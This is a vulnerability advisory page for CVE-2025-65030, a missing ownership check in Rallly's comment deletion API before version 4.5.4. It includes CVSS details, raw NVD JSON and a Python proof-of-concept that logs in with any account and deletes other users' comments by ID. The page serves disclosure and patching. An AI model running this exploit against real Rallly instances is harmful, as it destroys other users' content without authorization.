Security Vulnerability Report
CVE-2025-65030 CVSS 7.1 HIGH

CVE-2025-65030

Published: 2025-11-19 18:15:51
Last Modified: 2025-11-25 15:33:39

Description

Rallly is an open-source scheduling and collaboration tool. Prior to version 4.5.4, an authorization flaw in the comment deletion API allows any authenticated user to delete comments belonging to other users, including poll owners and administrators. The endpoint relies solely on the comment ID for deletion and does not validate whether the requesting user owns the comment or has permission to remove it. This issue has been patched in version 4.5.4.

CVSS Details

CVSS Score: 7.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:rallly:rallly:*:*:*:*:*:*:*:* - VULNERABLE
Rallly < 4.5.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2025-65030 PoC - Rallly Comment Deletion Authorization Flaw
# Target: Rallly < 4.5.4

TARGET_URL = "https://vulnerable-rallly-instance.com"


def delete_comment(cookies, comment_id):
    """
    Delete any comment by ID without ownership verification
    """
    endpoint = f"{TARGET_URL}/api/comments/{comment_id}"
    response = requests.delete(endpoint, cookies=cookies)
    return response.status_code == 200


def exploit():
    # Step 1: Authenticate with any valid account
    login_data = {"email": "[email protected]", "password": "password123"}
    session = requests.Session()
    login_resp = session.post(f"{TARGET_URL}/api/auth/login", json=login_data)
    if login_resp.status_code != 200:
        print("[-] Authentication failed")
        return False
    cookies = session.cookies
    print("[+] Authenticated successfully")

    # Step 2: Target comment ID (obtained from API or page source)
    target_comment_id = "VICTIM_COMMENT_ID_HERE"

    # Step 3: Delete victim comment without ownership check
    if delete_comment(cookies, target_comment_id):
        print(f"[+] Successfully deleted comment: {target_comment_id}")
        return True
    else:
        print("[-] Failed to delete comment")
        return False


if __name__ == "__main__":
    exploit()
```

References

https://github.com/lukevella/rallly/releases/tag/v4.5.4 (Release Notes)
https://github.com/lukevella/rallly/security/advisories/GHSA-4j32-25f9-qgfm (Exploit, Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-65030",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-19T18:15:50.567",
    "lastModified": "2025-11-25T15:33:38.803",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Rallly is an open-source scheduling and collaboration tool. Prior to version 4.5.4, an authorization flaw in the comment deletion API allows any authenticated user to delete comments belonging to other users, including poll owners and administrators. The endpoint relies solely on the comment ID for deletion and does not validate whether the requesting user owns the comment or has permission to remove it. This issue has been patched in version 4.5.4."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 4.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          { "lang": "en", "value": "CWE-285" },
          { "lang": "en", "value": "CWE-639" }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:rallly:rallly:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "4.5.4",
                "matchCriteriaId": "05349176-CA4D-4360-A7E1-0EA2D8C24E7E"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/lukevella/rallly/releases/tag/v4.5.4",
        "source": "[email protected]",
        "tags": ["Release Notes"]
      },
      {
        "url": "https://github.com/lukevella/rallly/security/advisories/GHSA-4j32-25f9-qgfm",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}
```